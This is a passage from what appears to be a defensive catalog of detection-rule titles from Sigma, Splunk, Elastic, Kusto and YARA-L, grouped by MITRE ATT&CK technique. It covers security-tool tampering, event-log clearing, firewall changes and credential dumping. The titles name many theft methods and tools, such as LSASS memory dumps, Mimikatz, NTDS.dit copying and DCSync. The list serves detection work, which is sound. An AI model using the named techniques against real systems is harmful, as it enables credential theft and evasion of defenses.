- Sigma Tamper Windows Defender - ScriptBlockLogging test
- Sigma Tamper Windows Defender Remove-MpPreference test
- Sigma Tamper Windows Defender Remove-MpPreference - ScriptBlockLogging test
- Sigma Tamper With Sophos AV Registry Keys test
- Sigma Taskkill Symantec Endpoint Protection test
- Sigma Terminate Linux Process Via Kill test
- Sigma Uncommon Extension In Keyboard Layout IME File Registry Value test
- Sigma Uninstall Crowdstrike Falcon Sensor test
- Sigma Uninstall Sysinternals Sysmon test
- Splunk Unload Sysmon Filter Driver production
- Splunk Unloading AMSI via Reflection production
- Sigma Vulnerable Driver Blocklist Registry Tampering Via CommandLine experimental
- Sigma WDAC Policy File Creation In CodeIntegrity Folder experimental
- Sigma Weak Encryption Enabled and Kerberoast test
- Sigma WerFaultSecure Loading DbgCore or DbgHelp - EDR-Freeze experimental
- Sigma WFP Filter Added via Registry experimental
- Sigma Win Defender Restored Quarantine File test
- Splunk Windows AD Domain Controller Audit Policy Disabled production
- Splunk Windows AD GPO Deleted production
- Splunk Windows AD GPO Disabled production
- Sigma Windows AMSI Related Registry Tampering Via CommandLine experimental
- Splunk Windows Attempt To Stop Security Service production
- Splunk Windows Audit Policy Auditing Option Disabled via Auditpol production
- Splunk Windows Audit Policy Cleared via Auditpol production
- Splunk Windows Audit Policy Disabled via Auditpol production
- Splunk Windows Audit Policy Disabled via Legacy Auditpol production
- Splunk Windows Audit Policy Excluded Category via Auditpol production
- Splunk Windows Audit Policy Restored via Auditpol production
- Splunk Windows Audit Policy Security Descriptor Tampering via Auditpol production
- Splunk Windows Cisco Secure Endpoint Stop Immunet Service Via Sfc production
- Splunk Windows Cisco Secure Endpoint Unblock File Via Sfc production
- Splunk Windows Cisco Secure Endpoint Uninstall Immunet Service Via Sfc production
- Sigma Windows Credential Guard Disabled - Registry experimental
- Sigma Windows Credential Guard Registry Tampering Via CommandLine experimental
- Sigma Windows Credential Guard Related Registry Value Deleted - Registry experimental
- Splunk Windows CrowdStrike Agent Registry Key Removal production
- Splunk Windows Defender ASR or Threat Configuration Tamper production
- Sigma Windows Defender Configuration Changes stable
- Sigma Windows Defender Context Menu Removed experimental
- Sigma Windows Defender Definition Files Removed test
- Sigma Windows Defender Exclusion List Modified test
- Splunk Windows Defender Exclusion Registry Entry production
- Sigma Windows Defender Exclusion Registry Key - Write Access Requested test
- Sigma Windows Defender Exclusions Added stable
- Sigma Windows Defender Exclusions Added - PowerShell test
- Sigma Windows Defender Exclusions Added - Registry test
- Sigma Windows Defender Exploit Guard Tamper test
- Sigma Windows Defender Grace Period Expired stable
- Sigma Windows Defender Malware And PUA Scanning Disabled stable
- Sigma Windows Defender Real-time Protection Disabled stable
- Sigma Windows Defender Real-Time Protection Failure/Restart stable
- Sigma Windows Defender Service Disabled - Registry test
- Sigma Windows Defender Submit Sample Feature Disabled stable
- Sigma Windows Defender Threat Detection Service Disabled stable
- Sigma Windows Defender Threat Severity Default Action Modified experimental
- Sigma Windows Defender Virus Scanning Feature Disabled stable
- Splunk Windows Disable or Modify Tools Via Taskkill production
- Splunk Windows Disable or Stop Browser Process production
- Splunk Windows Disable Windows Event Logging Disable HTTP Logging production
- Splunk Windows DisableAntiSpyware Registry production
- Splunk Windows DISM Remove Defender production
- Splunk Windows EDRSilencer Execution production
- Sigma Windows Event Auditing Disabled test
- Splunk Windows Event For Service Disabled production
- Splunk Windows Event Log Cleared production
- Splunk Windows Event Logging Service Has Shutdown production
- Sigma Windows EventLog Autologger Session Registry Modification Via CommandLine experimental
- Splunk Windows Eventlog Cleared Via Wevtutil production
- Splunk Windows Excessive Disabled Services Event production
- Sigma Windows Filtering Platform Blocked Connection From EDR Agent Binary test
- Splunk Windows Filtering Platform Policy Added to Block EDR Process production
- Sigma Windows Firewall Disabled via PowerShell test
- Splunk Windows Global Object Access Audit List Cleared Via Auditpol production
- Sigma Windows Hypervisor Enforced Code Integrity Disabled test
- Splunk Windows Impair Defense Add Xml Applocker Rules production
- Splunk Windows Impair Defense Change Win Defender Health Check Intervals production
- Splunk Windows Impair Defense Change Win Defender Quick Scan Interval production
- Splunk Windows Impair Defense Change Win Defender Throttle Rate production
- Splunk Windows Impair Defense Change Win Defender Tracing Level production
- Splunk Windows Impair Defense Configure App Install Control production
- Splunk Windows Impair Defense Define Win Defender Threat Action production
- Splunk Windows Impair Defense Delete Win Defender Context Menu production
- Splunk Windows Impair Defense Delete Win Defender Profile Registry production
- Splunk Windows Impair Defense Deny Security Software With Applocker production
- Splunk Windows Impair Defense Disable Controlled Folder Access production
- Splunk Windows Impair Defense Disable Defender Firewall And Network production
- Splunk Windows Impair Defense Disable Defender Protocol Recognition production
- Splunk Windows Impair Defense Disable PUA Protection production
- Splunk Windows Impair Defense Disable Realtime Signature Delivery production
- Splunk Windows Impair Defense Disable Web Evaluation production
- Splunk Windows Impair Defense Disable Win Defender App Guard production
- Splunk Windows Impair Defense Disable Win Defender Compute File Hashes production
- Splunk Windows Impair Defense Disable Win Defender Gen reports production
- Splunk Windows Impair Defense Disable Win Defender Network Protection production
- Splunk Windows Impair Defense Disable Win Defender Report Infection production
- Splunk Windows Impair Defense Disable Win Defender Scan On Update production
- Splunk Windows Impair Defense Disable Win Defender Signature Retirement production
- Splunk Windows Impair Defense Overide Win Defender Phishing Filter production
- Splunk Windows Impair Defense Override SmartScreen Prompt production
- Splunk Windows Impair Defense Set Win Defender Smart Screen Level To Warn production
- Splunk Windows Impair Defenses Disable Auto Logger Session production
- Splunk Windows Impair Defenses Disable HVCI production
- Splunk Windows Impair Defenses Disable Win Defender Auto Logging production
- Splunk Windows Important Audit Policy Disabled production
- Splunk Windows Increase in Group or Object Modification Activity production
- Splunk Windows Increase in User Modification Activity production
- Splunk Windows MpCmdRun RemoveDefinitions Execution production
- Splunk Windows New Custom Security Descriptor Set On EventLog Channel production
- Splunk Windows New EventLog ChannelAccess Registry Value Set production
- Splunk Windows Outlook Dialogs Disabled from Unusual Process production
- Splunk Windows PowerShell Disable HTTP Logging production
- Splunk Windows Powershell Import Applocker Policy production
- Splunk Windows Raccine Scheduled Task Deletion production
- Splunk Windows Registry Delete Task SD production
- Splunk Windows Registry Dotnet ETW Disabled Via ENV Variable production
- Splunk Windows Terminating Lsass Process production
- Sigma Windows Vulnerable Driver Blocklist Disabled experimental
- Splunk Wmic NonInteractive App Uninstallation production
- Sigma Write Protect For Storage Disabled test
Disable or Modify Tools: Disable or Modify Windows Event Log T1685.001 40 rules
- Sigma Audit Policy Tampering Via Auditpol test
- Sigma Audit Policy Tampering Via NT Resource Kit Auditpol test
- Sigma Change Winevt Channel Access Permission Via Registry test
- Sigma Disable Security Events Logging Adding Reg Key MiniNt test
- Sigma Disable Windows Event Logging Via Registry test
- Sigma Disable Windows IIS HTTP Logging test
- Sigma ETW Logging/Processing Option Disabled On IIS Server test
- Sigma EVTX Created In Uncommon Location test
- Sigma Filter Driver Unloaded Via Fltmc.EXE test
- Sigma Forest Blizzard APT - File Creation Activity test
- Sigma Forest Blizzard APT - JavaScript Constrained File Creation test
- Sigma HackTool - SharpEvtMute DLL Load test
- Sigma HackTool - SharpEvtMute Execution test
- Sigma HackTool - SysmonEnte Execution test
- Sigma HTTP Logging Disabled On IIS Server test
- Sigma Important Windows Event Auditing Disabled test
- Sigma New Module Module Added To IIS Server test
- Sigma Potential AutoLogger Sessions Tampering test
- Sigma Potential EventLog File Location Tampering test
- Sigma Potential Suspicious Activity Using SeCEdit test
- Sigma Previously Installed IIS Module Was Removed test
- Sigma Security Event Logging Disabled via MiniNt Registry Key - Process experimental
- Sigma Security Event Logging Disabled via MiniNt Registry Key - Registry Set experimental
- Sigma Suspicious Eventlog Clearing or Configuration Change Activity stable
- Sigma Suspicious Svchost Process Access test
- Sigma Sysmon Driver Unloaded Via Fltmc.EXE test
- Splunk Windows Audit Policy Auditing Option Disabled via Auditpol production
- Splunk Windows Audit Policy Cleared via Auditpol production
- Splunk Windows Audit Policy Disabled via Auditpol production
- Splunk Windows Audit Policy Disabled via Legacy Auditpol production
- Splunk Windows Audit Policy Excluded Category via Auditpol production
- Splunk Windows Audit Policy Restored via Auditpol production
- Splunk Windows Audit Policy Security Descriptor Tampering via Auditpol production
- Splunk Windows Disable Windows Event Logging Disable HTTP Logging production
- Sigma Windows Event Auditing Disabled test
- Sigma Windows EventLog Autologger Session Registry Modification Via CommandLine experimental
- Splunk Windows Global Object Access Audit List Cleared Via Auditpol production
- Splunk Windows New Custom Security Descriptor Set On EventLog Channel production
- Splunk Windows New EventLog ChannelAccess Registry Value Set production
- Splunk Windows PowerShell Disable HTTP Logging production
Disable or Modify Tools: Clear Windows Event Logs T1685.005 12 rules
- Splunk Disable Logs Using WevtUtil production
- Sigma Eventlog Cleared test
- Sigma Important Windows Eventlog Cleared test
- Sigma NotPetya Ransomware Activity test
- Sigma Security Eventlog Cleared test
- Sigma Suspicious Eventlog Clear test
- Sigma Suspicious Eventlog Clearing or Configuration Change Activity stable
- Splunk Suspicious wevtutil Usage production
- Sigma Suspicious Windows Trace ETW Session Tamper Via Logman.EXE test
- Splunk Windows Event Log Cleared production
- Splunk Windows Event Logging Service Has Shutdown production
- Splunk Windows Eventlog Cleared Via Wevtutil production
Disable or Modify System Firewall T1686 28 rules
- Sigma A Rule Has Been Deleted From The Windows Firewall Exception List test
- Sigma All Rules Have Been Deleted From The Windows Firewall Configuration test
- Splunk Allow File And Printing Sharing In Firewall production
- Splunk Allow Network Discovery In Firewall production
- Sigma Disable Microsoft Defender Firewall via Registry test
- Sigma Disable Windows Firewall by Registry test
- Splunk Firewall Allowed Program Enable production
- Sigma Firewall Disabled via Netsh.EXE test
- Sigma Firewall Rule Deleted Via Netsh.EXE test
- Sigma Firewall Rule Modified In The Windows Firewall Exception List test
- Sigma Netsh Allow Group Policy on Microsoft Defender Firewall test
- Sigma New Firewall Rule Added In Windows Firewall Exception List For Potential Suspicious Application test
- Sigma New Firewall Rule Added In Windows Firewall Exception List Via WmiPrvSE.EXE test
- Sigma New Firewall Rule Added Via Netsh.EXE test
- Sigma New Windows Firewall Rule Added Via New-NetFirewallRule Cmdlet test
- Sigma New Windows Firewall Rule Added Via New-NetFirewallRule Cmdlet - ScriptBlock test
- Sigma RDP Connection Allowed Via Netsh.EXE test
- Sigma Suspicious Program Location Whitelisted In Firewall Via Netsh.EXE test
- Sigma The Windows Defender Firewall Service Failed To Load Group Policy test
- Sigma Uncommon New Firewall Rule Added In Windows Firewall Exception List test
- Sigma Windows Defender Firewall Has Been Reset To Its Default Configuration test
- Splunk Windows Delete or Modify System Firewall production
- Sigma Windows Firewall Profile Disabled test
- Splunk Windows Firewall Rule Added production
- Splunk Windows Firewall Rule Deletion production
- Splunk Windows Firewall Rule Modification production
- Sigma Windows Firewall Settings Have Been Changed test
- Splunk Windows Modify System Firewall with Notable Process Path production
Disable or Modify System Firewall: Cloud Firewall T1686.001 2 rules
- Splunk Allow File And Printing Sharing In Firewall production
- Splunk Allow Network Discovery In Firewall production
Disable or Modify System Firewall: Windows Host Firewall T1686.003 20 rules
- Sigma A Rule Has Been Deleted From The Windows Firewall Exception List test
- Sigma All Rules Have Been Deleted From The Windows Firewall Configuration test
- Sigma Disable Microsoft Defender Firewall via Registry test
- Sigma Disable Windows Firewall by Registry test
- Sigma Firewall Disabled via Netsh.EXE test
- Sigma Firewall Rule Deleted Via Netsh.EXE test
- Sigma Firewall Rule Modified In The Windows Firewall Exception List test
- Sigma Netsh Allow Group Policy on Microsoft Defender Firewall test
- Sigma New Firewall Rule Added In Windows Firewall Exception List For Potential Suspicious Application test
- Sigma New Firewall Rule Added In Windows Firewall Exception List Via WmiPrvSE.EXE test
- Sigma New Firewall Rule Added Via Netsh.EXE test
- Sigma New Windows Firewall Rule Added Via New-NetFirewallRule Cmdlet test
- Sigma New Windows Firewall Rule Added Via New-NetFirewallRule Cmdlet - ScriptBlock test
- Sigma RDP Connection Allowed Via Netsh.EXE test
- Sigma Suspicious Program Location Whitelisted In Firewall Via Netsh.EXE test
- Sigma The Windows Defender Firewall Service Failed To Load Group Policy test
- Sigma Uncommon New Firewall Rule Added In Windows Firewall Exception List test
- Sigma Windows Defender Firewall Has Been Reset To Its Default Configuration test
- Sigma Windows Firewall Profile Disabled test
- Sigma Windows Firewall Settings Have Been Changed test
Safe Mode Boot T1688 1 rule
- Splunk Windows EFI Volume Mount Attempt Via Mountvol production
Downgrade Attack T1689 2 rules
- Sigma LSA PPL Protection Setting Modification via CommandLine test
- Splunk Windows Downdate Registry Activity production
Credential Access
OS Credential Dumping T1003 313 rules
- Splunk Access LSASS Memory for Dump Creation production
- Elastic Access to a Sensitive LDAP Attribute production
- Sigma Active Directory Replication from Non Machine Account test
- Splunk ADExplorer Execution (Sysmon)
- Splunk ADExplorer Execution (Windows Event Log)
- Splunk ADExplorer Snapshot Creation (Sysmon)
- Splunk ADExplorer Snapshot Creation (Windows Event Log)
- Sigma APT31 Judgement Panda Activity test
- Splunk Attacker Tools On Endpoint production
- Sigma Backdoor introduction via registry permission change through WMI (DAMP) experimental
- Splunk Browser Credential File Accessed - Windows (Windows Event Log)
- Sigma Capture Credentials with Rpcping.exe test
- Splunk Command Line lsass request (PowerShell)
- Splunk Command Line lsass request (Sysmon)
- Splunk Command Line lsass request (Windows Event Log)
- Splunk Common LSASS Memory Dump Behavior (Windows Event Log)
- Splunk comsvcs.dll Lsass Memory Dump (Sysmon)
- Splunk comsvcs.dll Lsass Memory Dump (Windows Event Log)
- Sigma Copying Sensitive Files with Credential Data test
- Sigma Crash Dump Created By Operating System experimental
- Splunk Create Remote Thread into LSASS production
- Sigma Create Volume Shadow Copy with Powershell test
- Sigma CreateDump Process Dump test
- YARA-L CreateDump Process Dump
- Splunk Creation of lsass Dump with Taskmgr production
- Splunk Creation of Shadow Copy production
- Splunk Creation of Shadow Copy with wmic and powershell production
- Sigma Cred Dump Tools Dropped Files test
- YARA-L Cred Dump Tools Dropped Files
- Elastic Credential Acquisition via Registry Hive Dumping production
- Sigma Credential Dumping Activity By Python Based Tool stable
- Sigma Credential Dumping Attempt Via WerFault test
- YARA-L Credential Dumping Attempt Via WerFault
- Kusto Credential Dumping Tools - File Artifacts available
- Kusto Credential Dumping Tools - Service Installation available
- Sigma Credential Dumping Tools Service Execution - Security test
- Sigma Credential Dumping Tools Service Execution - System test
- Splunk Credential Dumping via Copy Command from Shadow Copy production
- Splunk Credential Dumping via Symlink to Shadow Copy production
- Sigma Critical Hive In Suspicious Location Access Bits Cleared test
- Sigma Dbghelp/Dbgcore DLL Loaded By Uncommon/Suspicious Process test
- Splunk Detect Copy of ShadowCopy with Script Block Logging production
- Splunk Detect Credential Dumping through LSASS access production
- Splunk Detect Mimikatz With PowerShell Script Block Logging production
- Kusto Dev-0228 File Path Hashes November 2021
- Kusto Dev-0228 File Path Hashes November 2021 (ASIM Version)
- Elastic Disabling Lsa Protection via Registry Modification production
- Sigma Diskshadow command abuse to expose VSS backup experimental
- Kusto DopplePaymer Procdump available
- Sigma DPAPI Domain Backup Key Extraction test
- Sigma DPAPI Domain Master Key Backup Attempt test
- Splunk Dump File Identified (PowerShell)
- Splunk Dump File Identified (Sysmon)
- Splunk Dump File Identified (Windows Event Log)
- Splunk Dump LSASS via comsvcs DLL production
- Splunk Dump LSASS via procdump production
- Kusto Dumping LSASS Process Into a File available
- Sigma Dumping of Sensitive Hives Via Reg.EXE test
- Sigma Dumping Process via Sqldumper.exe test
- Sigma DumpMinitool Execution test
- Splunk Enable WDigest UseLogonCredential Registry production
- Splunk Esentutl Execution (PowerShell)
- Splunk Esentutl Execution (Sysmon)
- Splunk Esentutl Execution (Windows Event Log)
- Sigma Esentutl Gather Credentials test
- Splunk Esentutl SAM Copy production
- Sigma Esentutl Volume Shadow Copy Service Keys test
- Splunk Excessive DRSGetNCChanges Requests (Windows Event Log)
- Sigma Exchange group membership change to perform DCsync attack experimental
- Sigma File Access Of Signal Desktop Sensitive Data experimental
- Elastic First Time Seen Account Performing DCSync production
- Elastic Full User-Mode Dumps Enabled System-Wide production
- Sigma Group Managed Service Accounts password dump - GoldenGMSA experimental
- Sigma HackTool - CrackMapExec File Indicators test
- Sigma HackTool - CrackMapExec Process Patterns test
- Sigma HackTool - CreateMiniDump Execution test
- Sigma HackTool - Credential Dumping Tools Named Pipe Created test
- Sigma HackTool - Doppelanger LSASS Dumper Execution experimental
- Sigma HackTool - Dumpert Process Dumper Default File test
- YARA-L HackTool - Dumpert Process Dumper Default File
- Sigma HackTool - Dumpert Process Dumper Execution test
- YARA-L HackTool - Dumpert Process Dumper Execution
- Sigma HackTool - Generic Process Access test
- YARA-L HackTool - Generic Process Access
- Sigma HackTool - HandleKatz Duplicating LSASS Handle test
- Sigma HackTool - HandleKatz LSASS Dumper Execution test
- Sigma HackTool - Impacket File Indicators experimental
- Sigma HackTool - Inveigh Execution test
- Sigma HackTool - Mimikatz Execution test
- YARA-L HackTool - Mimikatz Execution
- Sigma HackTool - Potential Remote Credential Dumping Activity Via CrackMapExec Or Impacket-Secretsdump test
- Sigma HackTool - Pypykatz Credentials Dumping Activity test
- Sigma HackTool - Quarks PwDump Execution test
- Sigma HackTool - QuarksPwDump Dump File test
- Sigma HackTool - Rubeus Execution stable
- Sigma HackTool - Rubeus Execution - ScriptBlock test
- Sigma HackTool - SafetyKatz Dump Indicator test
- Sigma HackTool - SafetyKatz Execution test
- Sigma HackTool - Windows Credential Editor (WCE) Execution test
- Sigma HackTool - WSASS Execution experimental
- Sigma HackTool - XORDump Execution test
- Sigma Hacktool Execution - Imphash test
- Sigma Hacktool Execution - PE Metadata test
- Sigma IFM creation detected from commandline (installation from media) experimental
- Sigma IFM detected - ESENT (installation from media) experimental
- Sigma IIS Application Pool credential dumping experimental
- Sigma Interesting Service Enumeration Via Sc.EXE test
- Sigma Invocation of Active Directory Diagnostic Tool (ntdsutil.exe) test
- Sigma Kerberos key list attack for credential dumping experimental
- Elastic Kirbi File Creation production
- Kusto LaZagne Credential Theft available
- Sigma Live Memory Dump Using Powershell test
- Sigma Loaded Module Enumeration Via Tasklist.EXE test
- Sigma LSASS Access Detected via Attack Surface Reduction test
- Sigma LSASS Access From Non System Account test
- Sigma LSASS Access From Potentially White-Listed Processes test
- Sigma LSASS Access From Program In Potentially Suspicious Folder test
- Sigma LSASS credential dump with LSASSY (admin share) experimental
- Sigma LSASS credential dump with LSASSY (kernel access) experimental
- Sigma LSASS credential dump with LSASSY (PowerShell) experimental
- Sigma LSASS credential dump with LSASSY (process) experimental
- Kusto LSASS Credential Dumping with Procdump available
- Sigma LSASS Dump Keyword In CommandLine test
- YARA-L LSASS Dump Keyword In CommandLine
- Sigma LSASS dump via process access experimental
- Kusto LSASS Dumping using Debug Privileges
- Sigma Lsass Full Dump Request Via DumpType Registry Settings test
- Splunk LSASS Handle request (Windows Event Log)
- Sigma LSASS Memory Access by Tool With Dump Keyword In Name test
- YARA-L LSASS Memory Access by Tool With Dump Keyword In Name
- Elastic LSASS Memory Dump Handle Access production
- Sigma Lsass Memory Dump via Comsvcs DLL test
- YARA-L Lsass Memory Dump via Comsvcs DLL
- Sigma LSASS Process Crashed - Application experimental
- Sigma LSASS Process Dump Artefact In CrashDumps Folder test
- Sigma LSASS process dump by a non system account experimental
- Sigma LSASS Process Memory Dump Creation Via Taskmgr.EXE test
- YARA-L LSASS Process Memory Dump Creation Via Taskmgr.exe
- Sigma LSASS Process Memory Dump Files test
- YARA-L LSASS Process Memory Dump Files
- Elastic Memory Dump File with Unusual Extension production
- Sigma Microsoft IIS Connection Strings Decryption test
- Elastic Microsoft IIS Connection Strings Decryption production
- Sigma Microsoft IIS Service Account Password Dumped test
- Elastic Microsoft IIS Service Account Password Dumped production
- Splunk Mimikatz (Sysmon)
- Splunk Mimikatz (Windows Event Log)
- Sigma Mimikatz DC Sync test
- Splunk Mimikatz Execution (Windows Event Log)
- Sigma Mimikatz malicious Security package (SSP) exfiltrates cleartext passwords in file experimental
- YARA-L MITRE ATT&CK T1003 RW Mimikatz
- YARA-L MITRE ATT&CK T1003.003 RW Utilities Associated With Ntds.dit
- YARA-L MITRE ATT&CK T1003.003 WMIC Ntds.dit CISA Report
- Elastic Modification of WDigest Security Provider production
- Splunk MultiDump.exe Execution (Sysmon)
- Splunk MultiDump.exe Execution (Windows Event Log)
- Elastic Multiple Vault Web Credentials Read production
- Sigma NetSYnc attack experimental
- Sigma New Generic Credentials Added Via Cmdkey.EXE test
- Kusto Non Domain Controller Active Directory Replication available
- Sigma NotPetya Ransomware Activity test
- Elastic NTDS Dump via Wbadmin production
- Sigma NTDS Exfiltration Filename Patterns test
- Elastic NTDS or SAM Database File Copied production
- Splunk ntds.dit Access from Unexpected Location (Sysmon)
- Splunk ntds.dit Access from Unexpected Location (Windows Event Log)
- Splunk ntds.dit Command Line (PowerShell)
- Splunk ntds.dit Command Line (Sysmon)
- Splunk ntds.dit Command Line (Windows Event Log)
- Sigma NTDS.DIT Created test
- Sigma NTDS.DIT Creation By Uncommon Parent Process test
- Sigma NTDS.DIT Creation By Uncommon Process test
- Sigma Ntdsutil Abuse test
- Splunk Ntdsutil Export NTDS production
- Splunk NTDSUtil.exe execution (Sysmon)
- Splunk NTDSUtil.exe execution (Windows Event Log)
- Sigma Password Dumper Activity on LSASS test
- Sigma Password Dumper Remote Thread in LSASS stable
- Splunk PetitPotam Suspicious Kerberos TGT Request production
- Splunk Possible Credential Dumping via Windows Network Providers (PowerShell)
- Splunk Possible Credential Dumping via Windows Network Providers (Windows Event Log)
- Sigma Possible Impacket SecretDump Remote Activity test
- Elastic Potential Active Directory Replication Account Backdoor production
- Sigma Potential Adplus.EXE Abuse test
- Elastic Potential Credential Access via DCSync production
- Elastic Potential Credential Access via DuplicateHandle in LSASS production
- Elastic Potential Credential Access via LSASS Memory Dump production
- Elastic Potential Credential Access via Memory Dump File Creation production
- Elastic Potential Credential Access via Renamed COM+ Services DLL production
- Elastic Potential Credential Access via Trusted Developer Utility production
- Elastic Potential Credential Access via Windows Utilities production
- Sigma Potential Credential Dumping Activity Via LSASS test
- YARA-L Potential Credential Dumping Activity Via LSASS
- Sigma Potential Credential Dumping Attempt Using New NetworkProvider - CLI test
- Sigma Potential Credential Dumping Attempt Using New NetworkProvider - REG test
- Sigma Potential Credential Dumping Attempt Via PowerShell test
- Sigma Potential Credential Dumping Attempt Via PowerShell Remote Thread test
- Splunk Potential Credential Dumping of LSASS (Windows Event Log)
- Sigma Potential Credential Dumping Via LSASS Process Clone test
- Sigma Potential Credential Dumping Via LSASS SilentProcessExit Technique test
- YARA-L Potential Credential Dumping Via LSASS SilentProcessExit Technique
- Sigma Potential Credential Dumping Via WER test
- Splunk Potential DCSync (Windows Event Log)
- Sigma Potential Exploitation of CVE-2025-5054 or CVE-2025-4598 experimental
- Sigma Potential Invoke-Mimikatz PowerShell Script test
- Elastic Potential LSASS Clone Creation via PssCaptureSnapShot production
- Elastic Potential LSASS Memory Dump via PssCaptureSnapShot production
- Sigma Potential LSASS Process Dump Via Procdump stable
- YARA-L potential lsass process dump via procdump
- Splunk Potential nanodump execution (Windows Event Log)
- Sigma Potential Reconnaissance For Cached Credentials Via Cmdkey.EXE test
- Elastic Potential Remote Credential Access via Registry production
- Sigma Potential Russian APT Credential Theft Activity stable
- Sigma Potential SAM Database Dump test
- Sigma Potential SAM database user credentials dumped with DCshadow experimental
- Sigma Potential SysInternals ProcDump Evasion test
- Elastic Potential Veeam Credential Access Command production
- Sigma Potential Windows Defender AV Bypass Via Dump64.EXE Rename test
- Sigma Potentially Suspicious AccessMask Requested From LSASS test
- Sigma Potentially Suspicious GrantedAccess Flags On LSASS test
- Sigma Potentially Suspicious ODBC Driver Registered test
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Sigma PowerShell Get-Process LSASS in ScriptBlock test
- Sigma PowerShell SAM Copy test
- Sigma PPL Tampering Via WerFaultSecure experimental
- Splunk ProcDump Credential Harvest (Sysmon)
- Splunk ProcDump Credential Harvest (Windows Event Log)
- Sigma Procdump Execution test
- Sigma Process Access via TrolleyExpress Exclusion test
- Sigma Process Memory Dump Via Comsvcs.DLL test
- YARA-L Process Memory Dump Via Comsvcs.DLL
- Sigma Process Memory Dump via RdrLeakDiag.EXE test
- YARA-L Process Memory Dump via RdrLeakDiag.exe
- Kusto PRT Credential Stealing
- Sigma PUA - DIT Snapshot Viewer test
- Sigma PUA - Memory Dump Mount Via MemProcFS experimental
- Splunk pypykatz commands (Windows Event Log)
- Splunk RdrLeakDiag.exe Memory Dump (PowerShell)
- Splunk RdrLeakDiag.exe Memory Dump (Sysmon)
- Splunk RdrLeakDiag.exe Memory Dump (Windows Event Log)
- Sigma Remote LSASS Process Access Through Windows Remote Management stable
- Sigma Renamed CreateDump Utility Execution test
- YARA-L Renamed CreateDump Utility Execution
- Sigma Replication privileges accessed to perform DCSync attack experimental
- Splunk SAM Database File Access Attempt production
- Sigma SAM database user credentials dump with Mimikatz experimental
- Splunk SAM, System, Security Files Accessed (Windows Event Log)
- Elastic Searching for Saved Credentials via VaultCmd production
- Sigma Secretdump password dumping via SMB admin share experimental
- Splunk SecretDumps Offline NTDS Dumping Tool production
- Splunk SecretsDump Credential Harvest (Windows Event Log)
- Sigma Sensitive File Dump Via Print.EXE test
- Sigma Sensitive File Dump Via Wbadmin.EXE test
- Sigma Sensitive File Recovery From Backup Via Wbadmin.EXE test
- Sigma Shadow Copies Creation Using Operating Systems Utilities test
- Splunk Shadow Copy Created (Windows Event Log)
- Sigma Suspicious DumpMinitool Execution test
- Elastic Suspicious Execution via Windows Subsystem for Linux production
- Sigma Suspicious Get-ADDBAccount Usage test
- Sigma Suspicious Get-ADReplAccount test
- Sigma Suspicious Loading of Dbgcore/Dbghelp DLLs from Uncommon Location experimental
- Sigma Suspicious LSASS Access Via MalSecLogon test
- Elastic Suspicious LSASS Access via MalSecLogon production
- Elastic Suspicious Lsass Process Access production
- Elastic Suspicious Module Loaded by LSASS production
- Splunk Suspicious ntds.dit Commands (PowerShell)
- Splunk Suspicious ntds.dit Commands (Sysmon)
- Splunk Suspicious ntds.dit Commands (Windows Event Log)
- Sigma Suspicious Process Access to LSASS with Dbgcore/Dbghelp DLLs experimental
- Sigma Suspicious Process Patterns NTDS.DIT Exfil test
- Elastic Suspicious Remote Registry Access via SeBackupPrivilege production
- Sigma Suspicious Renamed Comsvcs DLL Loaded By Rundll32 test
- Sigma Suspicious SYSTEM User Process Creation test
- Sigma Suspicious Unsigned Dbghelp/Dbgcore DLL Loaded test
- Sigma Suspicious Usage Of Active Directory Diagnostic Tool (ntdsutil.exe) test
- Elastic Symbolic Link to Shadow Copy Created production
- Sigma Task Manager access indicator for potential LSASS dump experimental
- Splunk Task Manager lsass Dump (Windows Event Log)
- Sigma Task Manager used for LSASS dump (kernel) experimental
- Sigma Time Travel Debugging Utility Usage test
- Sigma Time Travel Debugging Utility Usage - Image test
- Sigma Transferring Files with Credential Data via Network Shares test
- Sigma Uncommon GrantedAccess Flags On LSASS test
- Sigma Unsigned Image Loaded Into LSASS Process test
- Elastic Untrusted DLL Loaded by Azure AD Connect Authentication Agent production
- Elastic Veeam Backup Library Loaded by Unusual Process production
- Sigma Volume Shadow Copy Mount test
- Sigma VolumeShadowCopy Symlink Creation Via Mklink stable
- Sigma VSSAudit Security Event Source Registration test
- Sigma WCE wceaux.dll Access test
- Sigma Wdigest authentication enabled (Reg via command) experimental
- Sigma Wdigest authentication enabled (registry) experimental
- Kusto WDigest downgrade attack available
- Splunk WDigest Forced Credential Caching (PowerShell)
- Splunk WDigest Forced Credential Caching (Sysmon)
- Splunk WDigest Forced Credential Caching (Windows Event Log)
- Sigma WerFault LSASS Process Memory Dump test
- Splunk Windows AD Replication Request Initiated by User Account production
- Splunk Windows AD Replication Request Initiated from Unsanctioned Location production
- Splunk Windows Cached Domain Credentials Reg Query production
- Splunk Windows Credential Dumping LSASS Memory Createdump production
- Sigma Windows Credential Editor Registry test
- Splunk Windows Hunting System Account Targeting Lsass production
- Splunk Windows LAPS Password Gathering Via PowerShell Script production
- Splunk Windows LSA Secrets NoLMhash Registry production
- Splunk Windows Mimikatz Binary Execution production
- Splunk Windows Non-System Account Targeting Lsass production
- Splunk Windows Possible Credential Dumping production
- Splunk Windows Rapid Authentication On Multiple Hosts production
- Elastic Windows Registry File Creation in SMB Share production
- Splunk Windows Remote Access Software BRC4 Loaded Dll production
- Splunk Windows Sensitive Registry Hive Dump Via CommandLine production
- Elastic Wireless Credential Dumping using Netsh Command production
OS Credential Dumping: LSASS Memory T1003.001 149 rules
- Splunk Access LSASS Memory for Dump Creation production
- Sigma APT31 Judgement Panda Activity test
- Splunk Common LSASS Memory Dump Behavior (Windows Event Log)
- Splunk comsvcs.dll Lsass Memory Dump (Sysmon)
- Splunk comsvcs.dll Lsass Memory Dump (Windows Event Log)
- Splunk Create Remote Thread into LSASS production
- Sigma CreateDump Process Dump test
- YARA-L CreateDump Process Dump
- Splunk Creation of lsass Dump with Taskmgr production
- Sigma Cred Dump Tools Dropped Files test
- YARA-L Cred Dump Tools Dropped Files
- Sigma Credential Dumping Activity By Python Based Tool stable
- Sigma Credential Dumping Attempt Via WerFault test
- YARA-L Credential Dumping Attempt Via WerFault
- Kusto Credential Dumping Tools - File Artifacts available
- Kusto Credential Dumping Tools - Service Installation available
- Sigma Credential Dumping Tools Service Execution - Security test
- Sigma Credential Dumping Tools Service Execution - System test
- Sigma Dbghelp/Dbgcore DLL Loaded By Uncommon/Suspicious Process test
- Splunk Detect Credential Dumping through LSASS access production
- Elastic Disabling Lsa Protection via Registry Modification production
- Splunk Dump LSASS via comsvcs DLL production
- Splunk Dump LSASS via procdump production
- Kusto Dumping LSASS Process Into a File available
